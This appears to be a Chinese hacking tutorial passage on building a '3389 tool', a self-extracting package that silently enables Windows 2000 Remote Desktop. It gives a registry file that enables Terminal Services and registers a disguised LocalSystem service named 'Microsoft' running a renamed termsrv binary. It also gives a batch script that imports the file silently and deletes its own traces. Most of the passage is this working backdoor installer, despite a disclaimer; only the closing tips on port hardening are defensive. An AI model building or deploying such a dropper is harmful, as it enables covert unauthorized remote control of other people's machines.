注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
OK,一个3389工具就制作完成了,有了这个工具对我们开远程服务会很有帮助哦!强调一点AK可不是教你做坏事!
PS:建议2000server系统的管理员删除TsInternetUser帐户,对安全也是一份保障。如果不需要开启远程控制服务的话,建议在TCP/IP筛选的“只允许TCP端口”里不要加入3389端口。如果有需要开的话,那么建议修改3389端口名,步骤如下:
1.打开注册表
开始-运行-regedit
2.修改注册表中3389端口
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
将PortNumber的值3389(十六进制为d3d) 改为 一个合理的端口(如19(十六进制为13))